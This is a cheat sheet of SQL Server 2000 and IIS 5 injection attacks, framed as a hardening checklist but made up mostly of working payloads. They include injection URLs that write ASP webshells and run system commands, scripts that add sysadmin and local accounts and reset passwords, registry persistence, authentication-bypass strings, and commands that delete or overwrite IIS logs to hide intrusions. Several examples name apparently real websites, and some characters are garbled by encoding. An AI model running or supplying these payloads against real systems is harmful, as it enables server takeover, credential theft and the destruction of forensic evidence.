MSSQL injection notes (SQL Server 2000 / IIS 5 era). Most of the primitives used below — xp_cmdshell, the OLE Automation procedures, ad hoc OPENROWSET/OPENDATASOURCE, sp_makewebtask, direct writes to system tables — need sysadmin and are disabled by default or removed on SQL Server 2005 and later. Read this as a hardening and detection checklist as much as an attack sheet: every technique here is also a thing to audit for.
1. Identify the database engine (each probe only succeeds on the engine named above it):
Access:
aNd aSc(cHr(97))=97
and exists(select id from MSysAccessObjects)
SQL Server:
and exists(select id from sysobjects)
MySQL:
and length(user())>0
ؼ%'and 1=1 and '%'='
ؼ%'and 1=2 and '%'='
If the two responses differ, the parameter is an injection point (the `%'` / `'%'='` wrapper closes a LIKE pattern and re-opens it so the query stays valid).
Writing a one-line ASP webshell through xp_cmdshell with `echo` — `^` is cmd.exe's escape character, so `<`, `>`, `(` and `)` reach the file instead of being parsed as redirection or grouping:
http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
Show the SQL Server version: `1=(select @@VERSION)` / `convert(int,@@version)` forces a varchar-to-int conversion error, so the version string is only echoed when the application returns verbose database errors (the second, `convert`, form is the more reliable one):
http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--
Microsoft VBScript '800a03f6'
Expected 'End'
/iisHelp/common/500-100.asp, line 242
Microsoft OLE DB Provider for ODBC Drivers '80040e07'
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp, line 17
3. The `in (...)` case. While testing one site the usual `and 1=1` probe failed even though the parameter was injectable: the application built its query as `select * from mytable where id in(1)` rather than `... where id=1`. Close the parenthesis first and re-open it at the end — append `) and 1=1 and 1 in(1` to the URL, so the statement becomes `select * from mytable where id in(1) and 1=1 and 1 in(1)` and the page renders normally. The same idea applies to string lists such as `select * from mytable where name in('firstsee')` (close the quote, then the parenthesis).
4. Check whether the xp_cmdshell extended procedure is registered (counts it in master..sysobjects; xtype 'X' = extended stored procedure):
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
Re-register xp_cmdshell if it was dropped (sp_addextendedproc needs sysadmin and the DLL path must be a local xplog70.dll). On SQL Server 2005+ the procedure is not dropped but disabled; re-enable it with `sp_configure 'show advanced options',1; reconfigure; sp_configure 'xp_cmdshell',1; reconfigure` — and alert on that configuration change:
http://www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
5. Persistence via xp_regwrite: a value under HKLM\...\CurrentVersion\Run makes `net user test ptlove /add` execute at the next interactive logon (nothing runs until someone logs on; the Run key is a standard place to monitor):
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'
6. Find the current database name:
? http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) — step n through 0,1,2,3…; db_name(n) returns the name of database id n and the comparison with 0 forces a conversion error that echoes it (needs verbose errors).
? http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript '800a03f6'
Expected 'End'
/iisHelp/common/500-100.asp, line 242
Microsoft OLE DB Provider for ODBC Drivers '80040e07'
Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp, line 17
7. List every database on the instance:
select * from master.dbo.sysdatabases — returns every column
select name from master.dbo.sysdatabases — returns only the name column
8. Running commands when xp_cmdshell is unavailable — drive WScript.Shell through the OLE Automation procedures (sp_OACreate / sp_OAMethod). Needs sysadmin; on SQL Server 2005+ the 'Ole Automation Procedures' option must also be enabled (off by default):
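-- Command execution without xp_cmdshell: create WScript.Shell through the OLE
-- Automation procedures, run cmd.exe with its output redirected to a file, and
-- read that file back into a table so the rows can be retrieved by injection.
-- Everything here runs as the SQL Server service account.
create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
DECLARE @hr INT
EXEC @hr = sp_oacreate 'wscript.shell',@shell output
-- Abort if the object could not be created (OLE Automation disabled, not
-- sysadmin); the original looped on @shell>0 with an unset token otherwise.
IF @hr <> 0 RETURN
-- run(command, windowStyle, waitOnReturn): '0' hides the window and 'true'
-- blocks until cmd.exe exits, so c:\temp.txt is complete before it is opened
-- (the wait matters for slow commands such as ping).
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
-- opentextfile returns a TextStream object; @file receives its object token.
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
-- Test AtEndOfStream before every ReadLine.  The original called ReadLine
-- first (an OLE error on an empty file) and never left the loop when
-- opentextfile had failed, because @isEnd was never set to 1.
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
WHILE @isEnd = 0
BEGIN
    EXEC sp_oamethod @file,'Readline',@out out
    insert INTO MYTMP(info) VALUES (@out)
    EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
END
-- Release the COM objects; the original leaked all three for the session.
EXEC sp_oamethod @file,'Close'
EXEC sp_oadestroy @file
EXEC sp_oadestroy @fso
EXEC sp_oadestroy @shell
-- Return the captured output before dropping the table; the original dropped
-- MYTMP in the same batch and so discarded the rows it had just collected.
SELECT ID, info FROM MYTMP ORDER BY ID
drop TABLE MYTMP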
----------
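-- Same WScript.Shell technique, here used to register the ISAPI DLLs
-- (including asp.dll) as in-process applications of IIS 5, so ASP pages run
-- inside inetinfo.exe as LocalSystem.  Output is appended to MYTMP, which the
-- preceding listing (item 8) must have created and not yet dropped.
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
DECLARE @hr INT
EXEC @hr = sp_oacreate 'wscript.shell',@shell output
-- stop if WScript.Shell is unavailable instead of looping on a dead token
IF @hr <> 0 RETURN
-- '0' = hidden window, 'true' = wait for cscript to finish before reading
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
-- end-of-stream is checked before each ReadLine (empty file, failed open)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
WHILE @isEnd = 0
BEGIN
    EXEC sp_oamethod @file,'Readline',@out out
    insert INTO MYTMP(info) VALUES (@out)
    EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
END
-- release the COM objects the original left dangling
EXEC sp_oamethod @file,'Close'
EXEC sp_oadestroy @file
EXEC sp_oadestroy @fso
EXEC sp_oadestroy @shell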
The same script on one line (for pasting into an injection point) — it registers asp.dll in-process so web requests execute as LocalSystem (see item 21):
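-- One-line form of the listing above, expanded for readability: register the
-- IIS 5 ISAPI DLLs in-process via WScript.Shell and capture adsutil's output
-- into MYTMP (created in item 8).  Fixes applied: abort when WScript.Shell
-- cannot be created, test AtEndOfStream before ReadLine, release COM objects.
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
DECLARE @hr INT
EXEC @hr = sp_oacreate 'wscript.shell',@shell output
IF @hr <> 0 RETURN
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
WHILE @isEnd = 0
BEGIN
    EXEC sp_oamethod @file,'Readline',@out out
    insert INTO MYTMP(info) VALUES (@out)
    EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
END
EXEC sp_oamethod @file,'Close'
EXEC sp_oadestroy @file
EXEC sp_oadestroy @fso
EXEC sp_oadestroy @shell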
Running an arbitrary executable the same way (here cscript on a VBScript previously dropped under the web share):
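-- Run an executable (cscript on a VBScript left on the web share) through
-- WScript.Shell and capture its output into MYTMP (created in item 8).
-- Same corrections as the listing in item 8: abort on creation failure,
-- check AtEndOfStream before ReadLine, release the COM objects.
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
DECLARE @hr INT
EXEC @hr = sp_oacreate 'wscript.shell',@shell output
IF @hr <> 0 RETURN
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
WHILE @isEnd = 0
BEGIN
    EXEC sp_oamethod @file,'Readline',@out out
    insert INTO MYTMP(info) VALUES (@out)
    EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
END
EXEC sp_oamethod @file,'Close'
EXEC sp_oadestroy @file
EXEC sp_oadestroy @fso
EXEC sp_oadestroy @shell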
Ways to run cmd.exe from SQL Server:
Delete the IIS log for 2005-07-18 (anti-forensics; W3SVC5 is the site's instance id). Defenders: ship IIS logs off-host so a local delete does not erase the evidence.
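-- (1) With xp_cmdshell: delete the IIS log for 2005-07-18 of site W3SVC5.
exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'
-- (2) Without xp_cmdshell: the same command through WScript.Shell, output
-- captured into MYTMP (created in item 8).  Creation failure aborts, the
-- end of the file is tested before each ReadLine, COM objects are released.
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
DECLARE @hr INT
EXEC @hr = sp_oacreate 'wscript.shell',@shell output
IF @hr <> 0 RETURN
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
WHILE @isEnd = 0
BEGIN
    EXEC sp_oamethod @file,'Readline',@out out
    insert INTO MYTMP(info) VALUES (@out)
    EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
END
EXEC sp_oamethod @file,'Close'
EXEC sp_oadestroy @file
EXEC sp_oadestroy @fso
EXEC sp_oadestroy @shell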
(3) Jet sandbox mode. Jet's `shell()` and other VBA functions are blocked while SandBoxMode restricts non-Access callers; the value can be changed through xp_regwrite. The original note debates whether DB_OWNER is enough — it is not: xp_regwrite lives in master and is granted to sysadmin only by default, so this route needs sysadmin (or an explicit EXECUTE grant), which is why the author suggests testing as sysadmin:
? exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
SandBoxMode values (HKLM\SOFTWARE\Microsoft\Jet\4.0\Engines):
0 — sandbox disabled at all times
1 — sandbox only for Access applications; non-Access callers such as SQL Server may run shell()
2 — sandbox only for non-Access applications
3 — sandbox always on
The default depends on the Jet service pack (2 on later ones); the technique sets it to 1. Monitoring writes to this key is cheap and catches the whole class.
? With sysadmin, through an ad hoc OPENROWSET against the Jet provider (on 2005+ also needs 'Ad Hoc Distributed Queries'; the .mdb path must exist and be readable by the service account):
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
? Alternative: create a linked server 'L0op8ack' pointing at the same .mdb:
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'
? Using the linked server: the preconditions are strict. DB_OWNER is not enough — sp_addlinkedserver needs sysadmin or setupadmin, sp_addlinkedsrvlogin needs sysadmin or securityadmin, so in practice only sa or a setupadmin+securityadmin login can do it. The author also reports that without those roles ias.mdb could not be used at all and an .mdb readable by the login in question had to be found instead. Treat the rest of this item as a lab note rather than a reliable path:
? ½ӷL0op8ack:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
? exec sp_addlinkedsrvlogin 'L0op8ack','false';--
exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
? select * FROM OPENQUERY(L0op8ack, 'select shell("cmd.exe /c net user")');--
? exec sp_droplinkedsrvlogin 'L0op8ack','false';--
? exec sp_dropserver 'L0op8ack';--
Overwrite the 2005-07-18 IIS log with a copy of an earlier day's log instead of deleting it (hides the gap in the log directory; same two variants as above, plus a `net user` example):
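-- (1) With xp_cmdshell: replace the 07-18 IIS log with a copy of 07-16's.
exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'
-- (2) The same without xp_cmdshell (WScript.Shell, output into MYTMP from
-- item 8); creation failure aborts, end of file is tested before ReadLine,
-- COM objects are released.
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
DECLARE @hr INT
EXEC @hr = sp_oacreate 'wscript.shell',@shell output
IF @hr <> 0 RETURN
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
WHILE @isEnd = 0
BEGIN
    EXEC sp_oamethod @file,'Readline',@out out
    insert INTO MYTMP(info) VALUES (@out)
    EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
END
EXEC sp_oamethod @file,'Close'
EXEC sp_oadestroy @file
EXEC sp_oadestroy @fso
EXEC sp_oadestroy @shell
-- (3) Same wrapper around `net user` to list local accounts.  Reuses the
-- variables declared above, so run it as its own batch or after (2).
EXEC @hr = sp_oacreate 'wscript.shell',@shell output
IF @hr <> 0 RETURN
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
WHILE @isEnd = 0
BEGIN
    EXEC sp_oamethod @file,'Readline',@out out
    insert INTO MYTMP(info) VALUES (@out)
    EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
END
EXEC sp_oamethod @file,'Close'
EXEC sp_oadestroy @file
EXEC sp_oadestroy @fso
EXEC sp_oadestroy @shell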
9. Update a row — here resetting an application admin's password hash directly in its table:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
The 16-character MD5 stored for user www, a0b923820dcc509a, is the middle 16 hex digits of MD5('1'), i.e. the password becomes '1'.
The full 32-character MD5('1') is c4ca4238a0b923820dcc509a6f75849b (unsalted MD5 password storage is what makes this trivially reversible).
10. Export a file with BCP.
BCP writes the result of a query to a file at a chosen path. Create a scratch table, insert the lines of an ASP webshell one row at a time, then run bcp (through xp_cmdshell, since it is a client tool) to write them out as an .asp under the web root.
Format:
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp -c -S localhost -U sa -P upload   (`-c` character mode, `-S` server, `-U` login, `-P` password — the dashes were lost in encoding; note the sa password ends up on a process command line, visible to anyone who can list processes)
11. Stash query results in a table and read them back through a conversion error:
? Create the table:
' and 1=1 union select 1,2,3,4;create table cyfd(gyfd varchar(255))--   (table and column names reconstructed from the statements below, which were lost in encoding)
? Write data into it:
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 @result=name from upload.dbo.sysobjects where xtype='U' and status>0 insert into cyfd (gyfd) values(@result);--
(The original reads `select top 1 name from ... status>0,@result output`, which is not valid T-SQL for a SELECT; the value has to be assigned with `@result=name`.)
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
? Read it back (error-based: comparing the varchar column with 1 raises a conversion error whose message carries the stored value):
' and 1=(select count(*) from cyfd where gyfd >1)--
? Drop the helper table when done:
';drop table cyfd;--
12. Change the sa password by writing the system table directly (SQL Server 2000 only):
? update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01 — sets sa's hash to the one for '111111' (per the original note). Direct writes to sysxlogins need sysadmin and `sp_configure 'allow updates',1` on SQL 2000; sysxlogins does not exist on 2005+ (ALTER LOGIN is the supported way there). The original also remarks that this only works if sa has not been removed.
? List all logins (password hashes included — sysadmin only):
select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins
? Set the sa password to empty with sp_password (old password NULL, new password ''): this leaves the instance open to anyone who can reach port 1433 — lab use only.
exec sp_password NULL,'','sa'
13. Tables and columns of the dvbbs database (user tables from sysobjects, xtype 'U'; then syscolumns by the table's object id):
? select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
? select * from dvbbs.dbo.syscolumns where id=1426104121
14. Manual backup of the current database to a file on the SQL Server host (needs db_owner or db_backupoperator in that database, or sysadmin):
Full backup:
;DECLARE @dbName sysname, @target nvarchar(4000)
-- Full backup of the database the injected query runs in, written to c:/db1 on
-- the SQL Server host; WITH FORMAT overwrites whatever media is already there.
-- The leading ';' closes the application's statement, the trailing '--'
-- comments out the rest of it.
SET @dbName = DB_NAME()
SET @target = 'c:/db1'
BACKUP DATABASE @dbName TO DISK = @target WITH FORMAT--
Differential backup:
;DECLARE @dbName sysname, @target nvarchar(4000)
-- Differential backup (changes since the last full backup) of the current
-- database.  Note WITH FORMAT re-initialises the media: run against the same
-- c:/db1 it destroys the full backup made above, so use a different file.
SET @dbName = DB_NAME()
SET @target = 'c:/db1'
BACKUP DATABASE @dbName TO DISK = @target WITH DIFFERENTIAL, FORMAT
15. Add (and later remove) a sysadmin login 'test'; the last line shows running a query file with isql:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
cmd.exe /c isql -E /U alma /P /i K:\test.qry
16. select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
lists the user tables of the ChouYFD database (status>0 filters out system-flagged objects); the name/id form below is enough for the next step:
select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0
17. Column enumeration through syscolumns:
? http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns where id=1234
lists the columns of the rdweb table whose object id is 1234
? select * from dvbbs.dbo.syscolumns where id=5575058
lists the columns of the dvbbs table whose object id is 5575058
18. Delete a record: delete from Dv_topic where boardid=5 and topicid=7978
19. Classic authentication-bypass strings for string-built login queries (the trailing `--` comments out the password check; none of them work against a parameterised query):
1) ' or''='
2) ' or 1=1--
3) ' or 'a'='a--
4) 'or'='or'
5) " or 1=1--
6or 1=1--
7 or 'a='a
8" or "a"="a
9 ') or ('a'='a
10 ") or ("a"="a
11 or (1=1
12) 'or''='
13) %' and 1=1 and '%'='
20. Finding the web root:
1) Read the site's home directory from the IIS metabase (needs a shell on the box):
? cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt — try site ids 1,2,3,4,5 in place of the 2
type c:\test1.txt
del c:\test1.txt
(The NBSI injection tool displays the same information directly.)
2) Pick an image name seen on the site, e.g. 123.jpg,
then write 123.bat that searches every drive for it:
d:
dir 123.jpg /s >c:\123.txt
e:
dir 123.jpg /s >>c:\123.txt
f:
dir 123.jpg /s >>c:\123.txt
Run it, then `type c:\123.txt`
— the directory containing the image is the web root.
3) If SQL Server and the web site share a machine, redirect command output into IIS's custom error page instead of a new file:
%windir%\help\iishelp\common\404b.htm or 500.asp
(back the original file up first)
e.g.:
dir c:\ >%windir%\help\iishelp\common\404b.htm
then request any page that does not exist (http://target-ip/2.asp): IIS answers with the modified 404 page, which now contains the listing.
4) On Windows 2000, read the web root from the registry with xp_regread: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots.
(On Windows 2003 that key was not found.)
Example:
1) Create a table cyfd with one column gyfd: http://www.cnwill.com/NewsShow.aspx?id=4844;create table cyfd(gyfd varchar(255))--   (names reconstructed from the following statements)
2) Write the web root into it: http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
3) Force a conversion error so the value appears in the error page: http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: conversion of the varchar value 'Y:\Web\…,,201 ' to int failed — the web root (Y:\Web\<site folder>) leaks in the .NET error page; the ',,201' tail is the Virtual Roots value format (path, user, access flags — verify against the host).
TargetSite: Boolean Read() — the path is exposed.
4) Clean up: http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--
5) Alternatively export the registry key with regedit into the IIS 404/500 error page (%windir%\help\iishelp\common\404b.htm or 500.asp):
regedit usage:
Regedit /L:system /R:user /E filename.reg Regpath
Meaning:
/L:system — path of System.dat (Windows 9x switch)
/R:user — path of User.dat (Windows 9x switch)
/E — export; the key named by Regpath is written to filename.reg
Regpath — the key to export. /L and /R are optional and only matter on Windows 9x, where regedit would otherwise look for system.dat/user.dat in the Windows directory; on NT-based systems they are ignored. `regedit /e D:\regedit.reg` with no key exports the whole registry to D:\regedit.reg.
regedit /s c:\adam.reg — import c:\adam.reg silently
regedit /e c:\web.reg — export the whole registry to c:\web.reg
win2000ϵͳC:\>regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
Then request http://target-ip/2.asp (any missing page) to view the exported key.
(Not located on Windows 2003; anyone who finds the equivalent, please write it up.)
6) %SystemRoot%\system32\inetsrv\MetaBack\ holds IIS metabase backups. If the administrator has ever backed IIS up, those files contain the web root paths and can be read with the table/error technique above.
7) Creating an IIS virtual directory through injection (needs xp_cmdshell, i.e. sysadmin) is another way to get a web path:
often there is injection and command execution but the web root cannot be found, so there is nowhere to drop a webshell — create a virtual directory instead:
? Create a virtual directory 'win' that maps to c:\winnt\system32: exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
? Grant script execution on 'win' (the `Cs:` in the original is a garbled `-s:`): exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" -s:'
? Delete the virtual directory afterwards: exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
? Test: http://127.0.0.1/win/test.asp   (defenders: a new virtual directory under a system folder is an unmistakable IIS metabase change to alert on)
8) Guessing the web directory with xp_dirtree (granted to public on SQL Server 2000). Web roots are usually on D:, then E:, then C:. First create a scratch table for xp_dirtree output:
;create table temp(dir nvarchar(255),depth varchar(255));--   dir = directory name, depth = nesting level. Then load the D: tree into it:
;insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:';--
Before going further, count the top-level folders on D: (excluding the usual system ones) to get a feel for the drive — vary the right-hand value 0,1,2,3…:
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM '))>=(=0123...)
Now suppose the site is known to have a directory called 'user' (seen in a path such as /userphoto). Test whether the web directory tree is on this drive with a filter query:
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)
A true result means the web root may be on this drive; confirm with other directory names the site is known to have:
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)
...
If every test comes back true, the web root is very likely on this drive.
Next, find the depth of the known directory (vary the right-hand value 1,2,3…):
and (select depth from temp where dir='user')>=(=123...)
If depth is 3, 'user' is three levels down on D:, so the web root itself is at level 2.
Drive and depth are now known; to find the exact location, walk down from the root of D: one level at a time — there is no need to learn every directory name, which would take far too long.
Create a second scratch table for the subdirectories of one first-level directory:
;create table temp1(dir nvarchar(255),depth varchar(255));--
Then store the subdirectories of the first (alphabetically) non-system first-level directory of D: into temp1:
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM ') order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
For the second first-level directory change the inner `top 1` to `top 2`, and so on.
temp1 now holds the subdirectories of one first-level directory; use the same filter to check whether the known web directory is among them:
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
True means the web root is under this directory — test several known names to avoid a false positive. If it is not there, repeat for the 2nd, 3rd… first-level directories. Note: delete the rows of temp1 before every xp_dirtree run, or the results of several directories get mixed.
Suppose the web root is under the first-level directory 'website' (its name is read out of temp the same way). The depth found earlier was 2, so the web root is a direct child of website; enumerate those children.
Create a third scratch table in the same way:
;create table temp2(dir nvarchar(255),depth varchar(255));--
Then load the subdirectories of D:\website into temp2:
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM ') order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
(for the second child of website change the inner `top 1` to `top 2`, and so on)
Check whether this child contains the known directory:
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
True — and true for every other known name — identifies this child as the web root.
Result: in this example the web root is D:\website\www.
The current database can now be backed up into that directory. Empty temp, temp1 and temp2 first (or load the C:, D: and E: trees into temp, temp1 and temp2 respectively when hunting across drives).
Drop the helper tables when finished; the application database itself usually also reveals admin-panel paths and similar information.
21. Windows 2000 / IIS 5: run ASP as the system account by registering the ISAPI DLLs in InProcessIsapiApps (needs administrator rights; the second line is the same command with the Windows-directory paths of a later install):
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"
cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"
Verify that it took effect:
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
inprocessisapiapps : (LIST) (6 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"
22. Hiding an ASP webshell in a folder named 'images..' — the trailing dots confuse Explorer and some listing tools, but the web server resolves the path normally:
Create the directory: mkdir images..\
Copy the shell in: copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
Reach it over the web: http://ip/images../news.asp?action=login
Remove it: rmdir images..\ /s
